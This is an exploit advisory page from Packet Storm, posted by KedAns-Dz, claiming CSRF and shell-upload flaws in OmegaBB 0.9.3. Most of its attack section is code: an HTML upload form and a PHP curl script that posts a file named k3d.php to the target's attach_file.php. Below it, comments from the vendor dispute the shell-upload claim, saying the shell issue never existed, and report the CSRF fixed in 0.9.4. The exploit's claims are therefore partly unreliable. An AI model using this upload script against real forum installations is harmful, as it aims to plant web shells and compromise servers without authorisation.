exploit the possibilities

OmegaBB 0.9.3 CSRF / Shell Upload

OmegaBB 0.9.3 CSRF / Shell Upload
Posted Aug 3, 2013
Authored by KedAns-Dz

OmegaBB versions 0.9.3 and below suffer from cross site request forgery and shell upload vulnerabilities.

tags | exploit, shell, vulnerability, csrf
MD5 | 0d4d9e4dcac92009ebe801ee9fc33dc0

OmegaBB 0.9.3 CSRF / Shell Upload

Change Mirror Download
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [+] Site : 1337day.com 0
# 1 [+] Support e-mail : submit[at]1337day.com 1
# 0 0
# 1 ######################################### 1
# 0 I'm KedAns-Dz member from Inj3ct0r Team 1
# 1 ######################################### 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : OmegaBB v0.9.3 <= (XSRF) File Upload Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria
# Web Site : www.1337day.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.owasp-dz.org | owasp-dz.org/forum
# Type : php - proof of concept - webapp 0day - remote
# Tested on : Windows7 (Fr)
# Vendor : [http://www.omegabb.com]
###

# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !

######## [ Proof / Exploit ] ################|=>

# Download : http://www.omegabb.com/omegabb-0.9.3.tar.gz

# p.0.c : /[PATH]/attach_file.php << upload file ( use temper data - or - the php/html exploit)

##>>> After creat new user/member u can upload attach's with this uploader

# dEmo : http://www.omegabb.com/demo/attach_file.php

####

<html>
<body>
<form name="iform" action="http://[HOST]/[PATH]/attach_file.php" method="post" enctype="multipart/form-data">
<input id="file" type="file" name="file" onchange="upload(); " />
<input type="hidden" name="imgnum" />
<input type="submit" value="Upload" title="Upload" />
</form></body>
</html>

####

<?php
$uploadfile="k3d.php";
$ch = curl_init("http://[HOST]/[PATH]/attach_file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# File Dir/Path is [/files/tmp/] ' but the uploader renamed the file to some Hash! ' :p

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================

Comments (4)

RSS Feed Subscribe to this comment feed
omegabb

This alert claims it can upload a code-injected file and gain shell access to the server. This is impossible for several reasons:

Firstly only file types you configure are allowed to be uploaded, a heuristics routine is ran to confirm it's an allowed file type. However this is insufficient as file heuristics can be spoofed. The true line of defence is how uploaded files are stored and rendered. Uploaded files are sandboxed in a directory which no one has access to (.htaccess), they are stripped of their filename and replaced with a hash number and loses UNIX permissions. When a client requests a file it passes through the file.php wrapper which reads and delivers the file as octet-stream. Should a file be uploaded with injected code it doesn't matter, since the file is never accessed directly.

Comment by omegabb
2013-08-09 18:51:24 UTC | Permalink | Reply
todd

Loses UNIX permissions? What does that mean exactly? What happens if the system is configured to allow PHP uploads, does the issue persist?

Any comment on the cross site request forgery issue? Thanks.

Comment by todd admin
2013-08-28 02:11:30 UTC | Permalink | Reply
omegabb

Upon further research, I do concede there is a CSRF issue. This consists of a malicious 3rd party website tricking a logged in user into posting undesired content. A vulnerability, indeed, but it is not a "rootkit", a way to get account passwords, no threat to the site as a whole. It's more like an embarrassment attack by tricking a naive user. This problem will be patched in the next version of OmegaBB.

Comment by omegabb
2014-01-23 01:01:01 UTC | Permalink | Reply
omegabb

The shell injection issue never existed.
The CSRF issue has been fixed as of version 0.9.4
www.omegabb.com/omegabb-0.9.4.tar.g…

Comment by omegabb
2014-01-31 01:27:53 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close